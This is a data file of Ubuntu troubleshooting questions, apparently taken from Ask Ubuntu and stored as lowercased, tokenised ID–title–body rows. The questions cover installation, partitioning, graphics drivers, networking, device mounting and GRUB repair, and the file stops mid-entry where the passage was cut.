301781	how to rename multiple files sequentially from command line ?	how to rename file as below as1100801000002.raw7ags as1100801001008.raw7ah4 as1100801002001.raw7ah9 as1100801003002.raw7ahe as1100801004009.raw7aht as1100801005002.raw7ahy as1100801010002.raw7aj3 to new name as1.txt as2.txt as3.txt as4.txt as5.txt as6.txt as7.txt
301783	open ubuntu .iso file on blank hard drive ?	i downloaded ubuntu from the web , its a 700mb .iso file ; i transfered this file to a cd-r and to a thumb drive . i am trying to load on a notebook which has a dod-erased hard drive ; it comes up with no operating system found , i can not get it to load from the .iso file on usb thumb drive or the burned disk . how do i get the os loaded , if i copy it directly from my thumb drive to the unpartitioned , blank hard drive will that work ? thank you !
301784	apt-get update failed to fetch while setting proxy	i realize that there are many `` failed to fetch '' questions asked before , but neither seems to resolve my issue . this is what i get after typing export http_proxy=http : //198.23.143.4:8080 then sudo apt-get update i have a newly installed ubuntu 11.10 ( not an upgrade ) err http : //extras.ubuntu.com oneiric inrelease err http : //us.archive.ubuntu.com oneiric inrelease err http : //us.archive.ubuntu.com oneiric-updates inrelease err http : //us.archive.ubuntu.com oneiric-backports inrelease err http : //security.ubuntu.com oneiric-security inrelease err http : //extras.ubuntu.com oneiric release.gpg unable to connect to 198.23.143.4:8080 : err http : //security.ubuntu.com oneiric-security release.gpg unable to connect to 198.23.143.4:8080 : err http : //us.archive.ubuntu.com oneiric release.gpg unable to connect to 198.23.143.4:8080 : err http : //us.archive.ubuntu.com oneiric-updates release.gpg unable to connect to 198.23.143.4:8080 : err http : //us.archive.ubuntu.com oneiric-backports release.gpg unable to connect to 198.23.143.4:8080 : reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-updates/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release.gpg unable to connect to 198.23.143.4:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric/release.gpg unable to connect to 198.23.143.4:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg unable to connect to 198.23.143.4:8080 : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-backports/release.gpg unable to connect to 198.23.143.4:8080 : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release.gpg unable to connect to 198.23.143.4:8080 : w : some index files failed to download . they have been ignored , or old ones used instead .
301787	opening a port for listening	i have a small program i created . here is a relevant piece of it : void tcpsocket : :connectsocket ( ) { socket = new qtcpsocket ( this ) ; socket- > connecttohost ( `` localhost '' , 77 ) ; if ( socket- > waitforconnected ( 3000 ) ) { qdebug ( ) < < `` connected '' ; socket- > write ( `` hello server\n\r\n '' ) ; socket- > waitforbyteswritten ( 1000 ) ; socket- > waitforreadyread ( 3000 ) ; qdebug ( ) < < `` reading : `` < < socket- > bytesavailable ( ) ; qdebug ( ) < < socket- > readall ( ) ; socket- > close ( ) ; } else { qdebug ( ) < < `` could not connect '' ; } } basically , i want to open a tcp socket at localhost:77 . i want to write some data to it , get a response , and then output the response . however , right now that port is closed , as most ports are in ubuntu by default . so right now it can not connect to that port to listen on . well from what i researched , iptables seems to be the only way to open a port for listening . so i run this line on my machine : sudo iptables -a input -p tcp -- dport 77 -j accept however , the port 77 is still not open . sudo netstat -tulpn active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1199/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1004/cupsd tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 1157/postgres tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1121/mysqld tcp6 0 0 : :1:631 : : : * listen 1004/cupsd udp 0 0 127.0.0.1:53 0.0.0.0 : * 1199/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * 1070/dhclient udp 0 0 0.0.0.0:39617 0.0.0.0 : * 990/avahi-daemon : r udp 0 0 0.0.0.0:5353 0.0.0.0 : * 990/avahi-daemon : r udp6 0 0 : ::57021 : : : * 990/avahi-daemon : r udp6 0 0 : ::5353 : : : * 990/avahi-daemon : r netstat doesnt show it to be open . also i still have the same problem with my program : it can not connect to 77 .
301788	if i remove a partition that was there first , does my second partition get access to the whole drive ?	i have ubuntu 13.04 and windows 8 dual-booted ( no uefi crap , older computer ) . windows 8 was installed first , ubuntu second . i want to remove my windows 8 using os-uninstaller , but if i do so , does that somehow move my ubuntu partition to where the windows 8 one was originally ( 420gb ) , giving ubuntu the whole drive space to use , or does that just leave unallocated space , and leave my ubuntu partition where it is on the drive ( only about 80gb , making 500 total ) ?
301793	efi partition vs /boot in uefi system	i have a hdd momentus thin ( 500gb ) + msata samsung ( 32gb ) and i intend to install ubuntu 13.04 in a uefi - gpt - secure boot - linux only system . i 'll set the `` / '' ( root partition ) to use the whole 500gb hdd ( dev/sda ) and i 'll partition the msata ( dev/sdb ) like this : sdb1 = efi partition ( 300mb ) sdb2 = swap ( 8gb ) sdb3 = ext4 volume ( rest ) my question is : do i need a `` /boot '' ( boot partition ) even though my system is uefi and i 've already created an efi partition ?
301797	13.04 unity desktop crashes when nvidia-current is installed	i 'm running a dell vostro 3750 running ubuntu 13.04 . i 've asked previously but had n't isolated why my ubuntu system crashed and had to be rebuilt twice . now i know . installing nvidia-current causes unity to crash . i immediately tried to remove the package : sudo apt-get remove nvidia-current after a reboot , i 'm in the same situation . how do i at least get back to the slow , unoptimized but working graphics i had before without the nvidia driver ?
301804	do i need intel linux graphics installer ?	i am using 64 bit ubuntu 13.04 on a system running optimus technology - nvidia 635m and an intel integrated card . recently came across this article for intel linux graphics installer : http : //networkedblogs.com/lhlmo now i am wondering if i need this installed ? if yes , then would also like to know what graphics drivers are currently running the intel card on my system then ? update - per qasim 's response tried installing , but even after adding the two keys provided on their website , software center gives me the below warning : lintian check results for /home/charlie/downloads/intel-linux-graphics-installer_1.0.1_amd64.deb : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . e : intel-linux-graphics-installer : malformed-deb-archive found 4 members instead of 3 let me know why am getting this message and what it means ?
301806	gearman job server and php extension	how may i install gearman job server and php extension on my ubuntu 13.04 desktop ? i 've already installed latest version of php on my ubuntu 13.04 desktop . i 've to run my custom script with gearman . would anyone please help me about this ?
301808	wireless is slow on ubuntu , fine on windows dual boot ?	i know there 's been a lot of questions about this , but most seem to have been while using wubi , or were router and or chipset specific . for me , internet on my ubuntu partition is slow to start , using latest chrome on 13.04 . ( i 've got an acer aspire 5349 ) each page just sits there for 5 or so seconds , then starts to load , and even then takes ages . however , over on windows 8 , it works flawlessly . only had this router for about a month , all the other devices and phones in the house work fine , but just my ubuntu side of my lappy does n't seem to work correctly , either with firefox ( disastrous ) , or chrome . it 's not constant though . occasionally , it 'll load perfectly fine , no problem at all . but about half - 70 % of the time , it 's just slow to start and slow to finish . i do n't really care that much if it 's only a dual boot problem , since i 'm about to become ubuntu-only in the morning , but if it 's gon na be a problem for me then , too , with just ubuntu , then i 'd like to see what 's going on with it . on chrome however i 've noticed in the little `` status bar '' in the bottom corner , when it 's being slow ( before a page even starts loading ) it says `` sending request ... '' , if that helps ... any help is appreciated !
301809	how can i remove ubuntu 12.04. ?	i just bought a dell and it has this weird thing called ubuntu . i dont like it and want to use windows 7 . please help me uninstall it . i dont have anything saved on it so i do n't care if data is removed . my dell has no cd drive , its a little laptop .
301810	github and many other website not loading	recently i installed ubuntu 13.04 on my desktop . after that , most of the websites do n't load in firefox or chrome either . i tried to ping those websites with terminal but ping is fine with terminal like github . but , the website does n't load anymore . i do n't know what 's the problem and why is that . i 've windows installation too and i can access those websites without problem in windows . that 's why i am here now . can anyone please help me about this issue ? it would be really a great help for me .
301814	how to run neogeo games	i have some old neo geo games ' backups which i play when i was a child . is there any way of playing this on this ubuntu 13.04 .
301816	unable to install ubuntu 13.04	okay so , i 'm trying to install ubuntu on my lenovo b570 because my windows screwed up saying it 's missing a boot file , which is the 5th time it 's happened to me . when i go to install ubuntu , the screen is blank until i hit a key , then it sits there for a little while longer , and it shows up with a garbled command prompt screen , and i ca n't do anything , it just sits there . before it starts the blankness , it says `` secure boot not enabled . '' can someone please help me with this ? i 'm tired of being stuck with just my chromebook ...
301821	no desktop after ubuntu 13.04 partial updgrade	i do n't know what happened but , i am not having launcher , minimize maximize close buttons . please help me . sometimes , am not able to type . very difficulty working from terminal .
301822	ppolicy with pam_ldap - pwdreset has no effect when logging in from ubuntu	we installed ppolicy overlay on our ldap server . password policies work correctly for locking out user after x incorrect password attempts , but we ca n't enforce user to change his password . when we set pwdreset=true attribute for a user - user can login as usual from ubuntu client machine . ldap server & client were setup according to ubuntu howto : https : //help.ubuntu.com/12.10/serverguide/openldap-server.html client machine uses pam_ldap configuration file /etc/ldap.conf has `` pam_lookup_policy yes '' line but pwdreset attribute is ignored . according to what i read on the internet pam_ldap should honor ppolicy and require user to change his password when pwdreset is set . but it does n't work for us.. how to make ubuntu client honor pwdreset attribute ? maybe i can turn on debug logging for pam_ldap ? but i ca n't find how to do it ...
301824	can i share my external hard drive used for backup with other item ?	i bought a pretty large external hard drive to backup my computer with and i have used deja dup a couple times . i noticed i have a directory ddbackup on my external hard drive now . can i use my external hard drive to store other things outside of the ddbackup directory ?
301826	how do you downgrade ubuntu 13.04 to ubuntu 12.04 lts ?	i 've been having trouble with gaming for awhile now and a lots of commands that look like it might fix the problems might help are for ubuntu 12.04 lts . so how do you downgrade ?
301842	skype 4.2 freezes , force quits , and can not re-start . ubuntu 13.04	i have skype 4.2 on ubuntu 13.04 . sometimes , skype randomly freezes . i have to force quit it . i try to re-start skype , its icon on unity blinks to indicate it 's loading . but nothing happens . the background of the icon turns back to transparent . it ca n't re-start . i have to shutdown my pc and restart ubuntu , it 's very tedious . is there a way around this so that i do n't have to restart my whole pc just to re-start skype ?
301843	how to mount an android ( 2.3.4 ) device on ubuntu 13.04	ubuntu recognizes the device , and seemingly assigned it to sdc in this instance , but mount keeps returning a 'no medium found ' message . here is lsusb output : us 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 04d9:1603 holtek semiconductor , inc . keyboard bus 002 device 007 : id 0fce:215b sony ericsson mobile communications ab bus 002 device 003 : id 093a:2510 pixart imaging , inc. optical mouse bus 002 device 004 : id 058f:6362 alcor micro corp . flash card reader/writer dmesg| grep scsi output : [ 0.568150 ] acpi : bus type scsi registered [ 1.023975 ] scsi0 : ata_piix [ 1.024035 ] scsi1 : ata_piix [ 1.179932 ] scsi2 : ata_piix [ 1.179982 ] scsi3 : ata_piix [ 1.223582 ] scsi 1:0:0:0 : direct-access ata samsung ssd 830 cxm0 pq : 0 ansi : 5 [ 1.223662 ] sd 1:0:0:0 : attached scsi generic sg0 type 0 [ 1.224331 ] scsi 1:0:1:0 : cd-rom hl-dt-st dvdram gh24ns90 in01 pq : 0 ansi : 5 [ 1.229146 ] sr0 : scsi3-mmc drive : 24x/48x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.229218 ] sr 1:0:1:0 : attached scsi cd-rom sr0 [ 1.229261 ] sr 1:0:1:0 : attached scsi generic sg1 type 5 [ 1.424473 ] scsi 3:0:0:0 : direct-access ata st3000dm001-1ch1 cc24 pq : 0 ansi : 5 [ 1.424606 ] sd 3:0:0:0 : attached scsi generic sg2 type 0 [ 1.489666 ] scsi4 : ahci [ 1.489714 ] scsi5 : ahci [ 4.121421 ] scsi6 : usb-storage 2-1.7:1.0 [ 4.121493 ] scsi7 : usb-storage 2-1.8:1.0 [ 5.120804 ] scsi 6:0:0:0 : direct-access generic usb sd reader 1.00 pq : 0 ansi : 0 [ 5.120832 ] scsi 7:0:0:0 : direct-access semc mass storage 0100 pq : 0 ansi : 2 [ 5.121357 ] scsi 6:0:0:1 : direct-access generic usb cf reader 1.01 pq : 0 ansi : 0 [ 5.121577 ] sd 7:0:0:0 : attached scsi generic sg3 type 0 [ 5.121859 ] scsi 6:0:0:2 : direct-access generic usb sm reader 1.02 pq : 0 ansi : 0 [ 5.122627 ] scsi 6:0:0:3 : direct-access generic usb ms reader 1.03 pq : 0 ansi : 0 [ 5.123620 ] sd 6:0:0:0 : attached scsi generic sg4 type 0 [ 5.123725 ] sd 6:0:0:1 : attached scsi generic sg5 type 0 [ 5.123826 ] sd 6:0:0:2 : attached scsi generic sg6 type 0 [ 5.125361 ] sd 6:0:0:3 : attached scsi generic sg7 type 0 [ 821.206856 ] scsi8 : usb-storage 2-1.8:1.0 [ 822.206192 ] scsi 8:0:0:0 : direct-access semc mass storage 0100 pq : 0 ansi : 2 [ 822.207363 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 1044.183578 ] scsi9 : usb-storage 2-1.5:1.0 [ 1045.183448 ] scsi 9:0:0:0 : direct-access semc mass storage 0100 pq : 0 ansi : 2 [ 1045.184785 ] sd 9:0:0:0 : attached scsi generic sg3 type 0 also , here is ls -lar /dev/disk output : /dev/disk/by-id : total 0 drwxr-xr-x 2 root root 540 may 29 23:12 . drwxr-xr-x 6 root root 120 may 29 22:55 .. lrwxrwxrwx 1 root root 9 may 29 22:55 ata-hl-dt-st_dvdram_gh24ns90_k61c7663112 - > ../../sr0 lrwxrwxrwx 1 root root 9 may 29 22:55 ata-samsung_ssd_830_series_s0z3neac844116 - > ../../sda lrwxrwxrwx 1 root root 10 may 29 22:55 ata-samsung_ssd_830_series_s0z3neac844116-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 may 29 22:55 ata-samsung_ssd_830_series_s0z3neac844116-part2 - > ../../sda2 lrwxrwxrwx 1 root root 10 may 29 22:55 ata-samsung_ssd_830_series_s0z3neac844116- part5 - > ../../sda5 lrwxrwxrwx 1 root root 9 may 29 22:55 ata-st3000dm001-1ch166_z1f1hhh1 - > ../../sdb lrwxrwxrwx 1 root root 10 may 29 22:55 ata-st3000dm001-1ch166_z1f1hhh1-part1 - > ../../sdb1 lrwxrwxrwx 1 root root 9 may 29 22:55 scsi-sata_samsung_ssd_830s0z3neac844116 - > ../../sda lrwxrwxrwx 1 root root 10 may 29 22:55 scsi-sata_samsung_ssd_830s0z3neac844116-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 may 29 22:55 scsi-sata_samsung_ssd_830s0z3neac844116-part2 - > ../../sda2 lrwxrwxrwx 1 root root 10 may 29 22:55 scsi-sata_samsung_ssd_830s0z3neac844116-part5 - > ../../sda5 lrwxrwxrwx 1 root root 9 may 29 22:55 scsi-sata_st3000dm001-1ch_z1f1hhh1 - > ../../sdb lrwxrwxrwx 1 root root 10 may 29 22:55 scsi-sata_st3000dm001-1ch_z1f1hhh1-part1 - > ../../sdb1 lrwxrwxrwx 1 root root 9 may 29 22:55 usb-generic_usb_cf_reader_058f312d81b-0:1 - > ../../sde lrwxrwxrwx 1 root root 9 may 29 22:55 usb-generic_usb_ms_reader_058f312d81b-0:3 - > ../../sdg lrwxrwxrwx 1 root root 9 may 29 22:55 usb-generic_usb_sd_reader_058f312d81b-0:0 - > ../../sdd lrwxrwxrwx 1 root root 9 may 29 22:55 usb-generic_usb_sm_reader_058f312d81b-0:2 - > ../../sdf lrwxrwxrwx 1 root root 9 may 29 23:12 usb-semc_mass_storage_43423541314545314a4d-0:0 - > ../../sdc lrwxrwxrwx 1 root root 9 may 29 22:55 wwn-0x5000c5004ec935bc - > ../../sdb lrwxrwxrwx 1 root root 10 may 29 22:55 wwn-0x5000c5004ec935bc-part1 - > ../../sdb1 lrwxrwxrwx 1 root root 9 may 29 22:55 wwn-0x5001480000000000 - > ../../sr0 lrwxrwxrwx 1 root root 9 may 29 22:55 wwn-0x5002538043584d30 - > ../../sda lrwxrwxrwx 1 root root 10 may 29 22:55 wwn-0x5002538043584d30-part1 - > ../../sda1 lrwxrwxrwx 1 root root 10 may 29 22:55 wwn-0x5002538043584d30-part2 - > ../../sda2 lrwxrwxrwx 1 root root 10 may 29 22:55 wwn-0x5002538043584d30-part5 - > ../../sda5 and finally my mount call : sudo mount /dev/sdc /mnt mount : no medium found on /dev/sdc i 've rebooted several times and used all the available ports on my computer . the phone model sony ericsson . i 've also created the udev rule : subsystem== '' usb '' , attr { idvendor } == '' 0fce '' , mode= '' 0666 '' , group= '' plugdev '' . the file is located at : /etc/udev/rules.d/51-android.rules . am i being dumb and overlooking something obvious ( sorry if i am ... ) ? thanks for any help you can offer . update as this device is n't activated ( no service provided from verizon ) i 'm unable to update the software . after searching , it seems that 2.3.4 ca n't be rooted ( so i can flash the newest firmware to the device ) using the superoneclick program ( i really wanted to use this ... ) . so i ended up downgrading the device to 2.3.3 by rooting it and flashing the 2.3.3 firmware to the device . after a reboot of the device , the phone asked me if i would like to mount my sd card , which i did , and ubuntu recognized it correctly . so i 'm now able to continue my original project , but the original question of how to mount the sd card of this device running 2.3.4 is still unanswered ... so to anyone else that has a sony ericsson xperia play running 2.3.4 trying to mount the sd card ( without taking the card out and putting in an sd card reader ... ) , i 'd recommend downgrading ( or upgrading ... ) the device until an actual solution is found . root at your own risk !
301844	storage server with ntfs and linux on old machine	we have several old computers at home , and many ide hdd drives . i would like to make a `` storage server '' from one . so i want to use its storage as a shared folder . the other computers are windows 7 / xp . reqirements : best config : pentium ii , 256 / 384 mb ram , 200gb+120gb+120gb , with lan no raid is needed i would like to format the non-linux partitions as ntfs ( so if linux dies , i put the hdd in win computer it can handle ) read/write is needed i would like to share the partitions root on smb ( so accessible by windows ) no gui for the `` server '' - only ssh is needed . what do you propose for me , with distro / version is good ? i am familiar with debian , ubuntu and centos . thank you in advance .
301847	all the data in my laptop hard drive completly formatted	yesterday i installed ubuntu 13.04 on my dell vostro 3550 laptop . accidentally all data on hard drive is formatted . is that any way to recovery that data.. ? i also tried testdisk but it does not show the deleted partition ...
301851	check as a root if a special path set	how do i check as a root if a special path set ? this command sudo echo $ android_sdk_home will show the path 's value for a normal user and not for a root .
301855	recovery problem	i am using virtual box 4.1.18 on windows 7 to work on ubuntu 10.04 . recently i started upgrading it to 12.04 , while upgrading i powered off the machine . when i restarted , it is not launching ubuntu completely . it is at ubuntu logo launching page and not going further . i did n't take any backup of my previous files , please help me in recovering my files from vdi . i attached below log for reference . virtualbox ( xp ) com server 4.1.18 r78361 win.amd64 ( jun 5 2012 15:58:59 ) release log 00:00:00.016 main log opened 2013-05-30t01:38:15.652067300z 00:00:00.016 main os product : windows 7 00:00:00.016 main os release : 6.1.7601 00:00:00.016 main executable : c : \program files\oracle\virtualbox\vboxsvc.exe 00:00:00.016 main process id : 5452 00:00:00.016 main package type : windows_64bits_generic 00:00:00.062 loading settings file `` c : \users\sriks/.virtualbox\virtualbox.xml '' with version `` 1.12-windows '' 00:00:00.062 usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:00:00.062 usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:00:00.655 vdinit finished 00:00:00.764 loading settings file `` c : \users\sriks\virtualbox vms\ubuntu\ubuntu.vbox '' with version `` 1.12-windows '' 00:00:00.936 loading settings file `` c : \users\sriks\virtualbox vms\ubuntu_12.04\ubuntu_12.04.vbox '' with version `` 1.12-windows '' 00:00:00.967 loading settings file `` c : \users\sriks\virtualbox vms\ubuntu_linux_crash\ubuntu_linux_crash.vbox '' with version `` 1.12-windows '' 00:00:10.452 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { machine } atext= { machine is not locked for session ( session state : unlocked ) } , preserve=false 00:00:11.092 error [ com ] : arc=vbox_e_iprt_error ( 0x80bb0005 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { saved screenshot data is not available ( verr_not_supported ) } , preserve=false 00:24:06.129 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:13.087 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:14.943 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:16.987 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:21.854 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:25.692 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:27.579 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:24:27.579 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:28:33.421 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:28:38.866 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:30:08.535 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:30:08.535 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 00:58:48.181 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { machine } atext= { machine is not locked for session ( session state : unlocked ) } , preserve=false 00:59:21.362 error [ com ] : arc=vbox_e_iprt_error ( 0x80bb0005 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { saved screenshot data is not available ( verr_not_supported ) } , preserve=false 03:31:43.910 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:50.681 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:52.615 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:54.035 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:54.035 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:55.017 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:55.017 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:55.548 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:31:55.548 usbproxy usblibdevcfgdrget : deviceiocontrol 1 fail winer ( 31 ) 03:35:02.453 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { machine } atext= { machine is not locked for session ( session state : unlocked ) } , preserve=false 03:35:03.435 error [ com ] : arc=vbox_e_iprt_error ( 0x80bb0005 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { saved screenshot data is not available ( verr_not_supported ) } , preserve=false 03:35:05.151 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { the machine is not mutable ( state is starting ) } , preserve=false 03:49:32.221 error [ com ] : arc=vbox_e_vm_error ( 0x80bb0003 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { machine } atext= { failed to get a console object from the direct session ( unknown status 0x80bb0007 ) } , preserve=false 03:49:55.340 error [ com ] : arc=vbox_e_object_not_found ( 0x80bb0001 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { no storage device attached to device slot 0 on port 1 of controller 'ide controller ' } , preserve=false 03:49:58.850 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { machine } atext= { machine is not locked for session ( session state : unlocked ) } , preserve=false 03:49:59.692 error [ com ] : arc=vbox_e_iprt_error ( 0x80bb0005 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { saved screenshot data is not available ( verr_not_supported ) } , preserve=false 03:50:00.847 error [ com ] : arc=vbox_e_invalid_vm_state ( 0x80bb0002 ) aiid= { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } acomponent= { sessionmachine } atext= { the machine is not mutable ( state is starting ) } , preserve=false
301858	grub does n't appears after first reboot	i 'm trying to install ubuntu 13.04 on lenovo thinkcenter with installed windows 7 from live cd . everything seems ok but after first reboot from ubuntu grub does n't appears and instead only windows 7 is loading . what can be wrong ? thanks ! update : as srivatsa kanchi sad i just had repair grub with following commands : sudo fdisk -l it 's give me list of partions where i should select with linux and mount with : sudo mount /dev/sda4 /mnt where sda4 my ubuntu partition . next fix grub : sudo grub-install -- root-directory=/mnt /dev/sda that 's all . thanks !
301870	add libreoffice to nautilus right click `create new document` menu	how do i add libreoffice word processing to the options on the nautilus right click create new document menu ? i 'm on 12.04 .
301875	time sync between ubuntu and windows	iam working as a linux admin . in our company we are using a ubuntu server with windows clients . the time in each clients are not same . is it possible to sync time from ubuntu server with the windows clients ? plz help
301877	aztech playxtreme itv101e	aztech playxtreme itv101e is an android tv ( with ics : http : //www.aztech.com/sg/playxtreme.html ) . is there a possibility of installing ubuntu in that ? if possible that will allow me to break through a communication technology that all poor/orphanage will enjoy in tamilnadu , india .
301881	installation failed [ errno 30 ] read-only file system faulty cd/dvd , drive , hard disk	i tried to install ubuntu 12.10 and ubuntu 13.04 using flash drive and dvd , but all times i get this error . what does it say ? and how can i fix it ?
301882	how to fix bumblebee after a package upgrade ?	i have been having issues with bumblebee after a kernel package upgrade . it started in 12.04 and has been carried on into 13.04 . basically it is outlined as follows ; after a clean install of ubuntu ( no matter the release ) , i install bumblebee and it works well out of the box . when the kernel is upgraded ( e.g . from 3.8.0-19 to 3.8.0-22 ) , after some time , bumblebee breaks with the following error in /var/log/syslog : kernel : [ 4.135691 ] bbswitch : unknown symbol mcount ( err 0 ) bumblebeed [ 1259 ] : module bbswitch could not be loaded ( timeout ? ) bumblebeed [ 1259 ] : no switching method available . the dedicated card will always be on . bumblebeed [ 1259 ] : /usr/sbin/bumblebeed 3.2.1 started the output of bumblebeed -- v : [ 3326.529062 ] [ debug ] found card : 01:00.0 ( discrete ) [ 3326.529106 ] [ debug ] found card : 00:02.0 ( integrated ) [ 3326.529121 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 3326.529739 ] [ info ] configured driver : nvidia [ 3326.529767 ] [ debug ] skipping auto-detection , using configured driver 'nvidia' [ 3326.529986 ] [ debug ] process /sbin/modprobe started , pid 4986 . [ 3326.530101 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 3326.533252 ] [ debug ] sigchild received , but wait failed with no child processes [ 3326.533715 ] [ info ] loading driver bbswitch ( module bbswitch ) [ 3326.533961 ] [ debug ] process modprobe started , pid 4987 . error : could not insert 'bbswitch ' : unknown symbol in module , or unknown parameter ( see dmesg ) [ 3326.537523 ] [ debug ] process with pid 4987 returned code 1 [ 3326.537888 ] [ error ] module bbswitch could not be loaded ( timeout ? ) [ 3326.537936 ] [ debug ] bbswitch is not available , perhaps you need to insmod it ? [ 3326.537993 ] [ info ] skipping switcheroo pm method because it is not explicitly selected in the configuration . [ 3326.538022 ] [ warn ] no switching method available . the dedicated card will always be on . [ 3326.538047 ] [ debug ] active configuration : [ 3326.538078 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 3326.538100 ] [ debug ] x display : :8 [ 3326.538122 ] [ debug ] ld_library_path : /usr/lib/nvidia-304 : /usr/lib32/nvidia-304 [ 3326.538150 ] [ debug ] socket path : /var/run/bumblebee.socket [ 3326.538172 ] [ debug ] pidfile : /var/run/bumblebeed.pid [ 3326.538207 ] [ debug ] xorg.conf file : /etc/bumblebee/xorg.conf.nvidia [ 3326.538238 ] [ debug ] xorg.conf.d dir : /etc/bumblebee/xorg.conf.d [ 3326.538260 ] [ debug ] modulepath : /usr/lib/nvidia-304/xorg , /usr/lib/xorg/modules [ 3326.538282 ] [ debug ] gid name : bumblebee [ 3326.538306 ] [ debug ] power method : auto [ 3326.538328 ] [ debug ] stop x on exit : 1 [ 3326.538354 ] [ debug ] driver : nvidia [ 3326.538375 ] [ debug ] driver module : nvidia-304 [ 3326.538402 ] [ debug ] card shutdown state : 1 [ 3326.538635 ] [ debug ] process /sbin/modprobe started , pid 4988 . [ 3326.538722 ] [ debug ] hiding stderr for execution of /sbin/modprobe [ 3326.541954 ] [ debug ] sigchild received , but wait failed with no child processes [ 3326.542076 ] [ debug ] configuration test passed . [ 3326.542196 ] [ error ] daemon already running , pid 1292 the output of dmesg | grep bbswitch : bbswitch : unknown symbol mcount ( err 0 ) the output of dkms bbswitch status : bbswitch , 0.7 , 3.8.0-19-generic , x86_64 : installed bbswitch , 0.7 , 3.8.0-22-generic , x86_64 : installed this issue has recently been posted here but no solution has been posted . also it is different from this issue . currently , the only workaround i have found so far is redoing a clean install of ubuntu , upgrading to the lastest kernel version and then installing bumblebee . after this it works fine , until the next kernel 